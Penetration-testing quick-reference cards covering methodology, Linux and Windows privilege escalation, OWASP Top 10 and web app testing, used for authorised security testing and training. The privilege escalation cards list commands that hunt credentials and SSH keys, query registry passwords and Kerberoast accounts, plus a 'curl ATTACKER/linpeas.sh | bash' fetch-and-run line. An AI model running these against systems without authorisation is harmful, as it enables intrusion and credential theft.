Quick-Reference Cards

Six rapid-lookup reference cards covering core penetration testing methodology, common ports, privilege escalation, and web application security. Print these, pin them up, and reach for them mid-engagement.

Card 1: Pentest Methodology

Phase 1 — Pre-Engagement

Phase 2 — Reconnaissance

Phase 3 — Exploitation

Phase 4 — Post-Exploitation

Phase 5 — Reporting

Phase 6 — Remediation Verification

Card 2: Common Ports and Services (Top 50)

Card 3: Linux Privilege Escalation Checklist

Quick Wins

• [ ] sudo -l — Check sudo permissions (GTFOBins for exploit)
• [ ] SUID/SGID binaries: find / -perm -4000 -type f 2>/dev/null
• [ ] World-writable files: find / -writable -type f 2>/dev/null
• [ ] Credentials in files: grep -rli "password" /etc/ /home/ /opt/ /var/ 2>/dev/null
• [ ] Readable /etc/shadow
• [ ] Writable /etc/passwd (add a root-level user)
• [ ] SSH keys in home directories: find / -name "id_rsa" 2>/dev/null

System Enumeration

• [ ] OS version: cat /etc/os-release && uname -a
• [ ] Kernel version: uname -r (check for kernel exploits)
• [ ] Running processes: ps aux
• [ ] Installed packages: dpkg -l or rpm -qa
• [ ] Network connections: ss -tulnp or netstat -tulnp
• [ ] Internal services not exposed externally
• [ ] Environment variables: env (check for secrets)
• [ ] Available compilers: which gcc cc python python3 perl

File System

• [ ] /etc/crontab and /var/spool/cron/ — Cron jobs running as root
• [ ] Writable cron scripts or directories
• [ ] /opt/, /srv/, /var/ — Non-standard applications
• [ ] Config files: database creds, API keys, passwords
• [ ] .bash_history and other history files
• [ ] Backup files: *.bak, *.old, *.conf.bak
• [ ] Log files with sensitive data: /var/log/
• [ ] Mounted file systems: mount and cat /etc/fstab
• [ ] NFS exports with no_root_squash: cat /etc/exports

Services and Networking

• [ ] Services running as root: ps aux | grep root
• [ ] Internal-only services (127.0.0.1)
• [ ] Docker socket accessible: ls -la /var/run/docker.sock
• [ ] Docker group membership: id
• [ ] LXD/LXC group membership
• [ ] Writable service files: systemd units, init scripts

Advanced

• [ ] Capabilities: getcap -r / 2>/dev/null
• [ ] PATH hijacking: writable directories in PATH
• [ ] Library hijacking: LD_LIBRARY_PATH, LD_PRELOAD
• [ ] Wildcard injection in cron scripts (tar, rsync)
• [ ] Python library hijacking
• [ ] Kernel exploits: DirtyPipe (CVE-2022-0847), DirtyCow (CVE-2016-5195), etc.

Automated Tools

• LinPEAS: curl ATTACKER/linpeas.sh | bash
• LinEnum: ./linenum.sh
• linux-exploit-suggester: ./les.sh
• pspy: monitor processes without root

Card 4: Windows Privilege Escalation Checklist

Quick Wins

• [ ] whoami /priv — Check for dangerous privileges:
• SeImpersonatePrivilege → Potato attacks (JuicyPotato, PrintSpoofer, GodPotato)
• SeBackupPrivilege → Read any file (SAM/SYSTEM/NTDS)
• SeRestorePrivilege → Write any file
• SeDebugPrivilege → Inject into any process
• SeTakeOwnershipPrivilege → Take ownership of any object
• SeAssignPrimaryTokenPrivilege → Token manipulation
• [ ] Stored credentials: cmdkey /list
• [ ] Saved WiFi passwords: netsh wlan show profiles
• [ ] Unquoted service paths: wmic service get name,pathname,startmode
• [ ] AlwaysInstallElevated: check both HKLM and HKCU registry

System Enumeration

• [ ] System info: systeminfo
• [ ] OS version and patches: wmic qfe list
• [ ] Architecture: echo %PROCESSOR_ARCHITECTURE%
• [ ] Users and groups: net user, net localgroup administrators
• [ ] Network connections: netstat -ano
• [ ] Running processes: tasklist /SVC
• [ ] Installed software: wmic product get name,version
• [ ] Scheduled tasks: schtasks /query /fo TABLE /nh
• [ ] Services: sc query state= all
• [ ] Environment variables: set

Service Exploitation

• [ ] Modifiable services: accesschk.exe -uwcqv "Authenticated Users" *
• [ ] Unquoted service paths with writable directories
• [ ] Weak service permissions (change binpath)
• [ ] DLL hijacking: missing DLLs in service executables
• [ ] Service restart permissions

Registry

• [ ] AutoRuns: reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
• [ ] AlwaysInstallElevated: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
• [ ] Passwords in registry: reg query HKLM /f password /t REG_SZ /s
• [ ] AutoLogon credentials: reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Credential Hunting

• [ ] SAM/SYSTEM backups: C:\Windows\repair\, C:\Windows\System32\config\RegBack\
• [ ] Unattend files: C:\Windows\Panther\Unattend.xml, Unattend.xml, sysprep.xml
• [ ] IIS config: C:\inetpub\wwwroot\web.config
• [ ] PowerShell history: (Get-PSReadLineOption).HistorySavePath
• [ ] Cached credentials: cmdkey /list → runas /savecred
• [ ] Browser saved passwords
• [ ] KeePass databases, PuTTY sessions, FileZilla configs
• [ ] DPAPI credential files

Active Directory (if domain-joined)

• [ ] Domain enumeration: net user /domain, net group /domain
• [ ] BloodHound collection for attack paths
• [ ] Kerberoasting: GetUserSPNs.py
• [ ] AS-REP Roasting: GetNPUsers.py
• [ ] GPP passwords: gpp-decrypt
• [ ] LAPS: Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd

Automated Tools

• WinPEAS: winpeas.exe
• PowerUp: Invoke-AllChecks
• Seatbelt: Seatbelt.exe -group=all
• Watson: patch-level to exploit mapping
• SharpUp: C# port of PowerUp

Card 5: OWASP Top 10 (2021) Quick Reference

A01:2021 — Broken Access Control

What: Users can act outside their intended permissions.

A02:2021 — Cryptographic Failures

What: Failures related to cryptography (or lack thereof) that expose sensitive data.

A03:2021 — Injection

What: Untrusted data sent to an interpreter as part of a command or query.

A04:2021 — Insecure Design

What: Flaws in design and architecture rather than implementation.

A05:2021 — Security Misconfiguration

What: Missing or incorrect security hardening across the application stack.

A06:2021 — Vulnerable and Outdated Components

What: Using components with known vulnerabilities.

A07:2021 — Identification and Authentication Failures

What: Weaknesses in authentication mechanisms.

A08:2021 — Software and Data Integrity Failures

What: Failures to protect against integrity violations.

A09:2021 — Security Logging and Monitoring Failures

What: Insufficient logging, detection, and response capabilities.

A10:2021 — Server-Side Request Forgery (SSRF)

What: Application fetches remote resources without validating the user-supplied URL.

Card 6: Web Application Testing Checklist

Information Gathering

• [ ] Technology stack identification (Wappalyzer, WhatWeb)
• [ ] Directory and file enumeration (ffuf, Gobuster)
• [ ] Subdomain enumeration
• [ ] Virtual host discovery
• [ ] API endpoint discovery
• [ ] JavaScript file analysis for endpoints and secrets
• [ ] Robots.txt, sitemap.xml, .well-known
• [ ] Error page analysis for information disclosure
• [ ] HTTP methods testing (OPTIONS, PUT, DELETE, TRACE)

Authentication Testing

• [ ] Default credentials
• [ ] Password policy strength (minimum length, complexity)
• [ ] Account lockout mechanism
• [ ] Brute force protection / rate limiting
• [ ] Password reset mechanism security
• [ ] Remember me functionality
• [ ] Multi-factor authentication (present? bypassable?)
• [ ] Session token entropy (Burp Sequencer)
• [ ] Session invalidation on logout
• [ ] Session invalidation on password change
• [ ] Concurrent session handling
• [ ] Session fixation
• [ ] Cookie flags (Secure, HttpOnly, SameSite)

Authorization Testing

• [ ] Horizontal privilege escalation (access other users' data)
• [ ] Vertical privilege escalation (access admin functionality)
• [ ] IDOR on all object references (user IDs, file names, order IDs)
• [ ] Forced browsing to restricted pages
• [ ] API endpoint authorization checks
• [ ] HTTP method-based authorization bypass
• [ ] Directory traversal on file operations

Input Validation

• [ ] SQL injection (all input points, including headers and cookies)
• [ ] Cross-site scripting (reflected, stored, DOM-based)
• [ ] Command injection
• [ ] Server-side template injection (SSTI)
• [ ] XML External Entity (XXE)
• [ ] Server-side request forgery (SSRF)
• [ ] Local/remote file inclusion (LFI/RFI)
• [ ] HTTP parameter pollution
• [ ] HTTP request smuggling
• [ ] Open redirect
• [ ] CRLF injection

Business Logic

• [ ] Price manipulation (modify price in request)
• [ ] Quantity manipulation (negative values, zero)
• [ ] Workflow bypass (skip steps in multi-step process)
• [ ] Race conditions (concurrent requests)
• [ ] Feature abuse (unintended use of legitimate features)
• [ ] Coupon/discount code reuse
• [ ] Payment gateway bypass

File Operations

• [ ] File upload restrictions (bypass extension filters, MIME types)
• [ ] Upload path traversal
• [ ] Upload of web shells
• [ ] SVG upload for XSS
• [ ] File download / path traversal
• [ ] Zip slip vulnerability

Client-Side

• [ ] Cross-site request forgery (CSRF)
• [ ] Clickjacking (X-Frame-Options, CSP frame-ancestors)
• [ ] CORS misconfiguration
• [ ] WebSocket security
• [ ] Client-side storage (localStorage, sessionStorage) sensitive data
• [ ] Postmessage vulnerabilities

API-Specific

• [ ] API authentication (API keys, OAuth, JWT)
• [ ] JWT vulnerabilities (none algorithm, weak secret, algorithm confusion)
• [ ] Mass assignment / parameter binding
• [ ] Rate limiting on API endpoints
• [ ] Excessive data exposure in responses
• [ ] GraphQL introspection enabled
• [ ] GraphQL batching attacks

Configuration

• [ ] SSL/TLS configuration (testssl.sh, SSLyze)
• [ ] Security headers (check with securityheaders.com)
• [ ] HTTP to HTTPS redirect
• [ ] HSTS implementation
• [ ] Content Security Policy (CSP)
• [ ] Debug/development mode enabled
• [ ] Server version disclosure
• [ ] Directory listing enabled

These reference cards provide starting points for common testing activities. Adapt them to each engagement based on scope, technology stack, and testing objectives.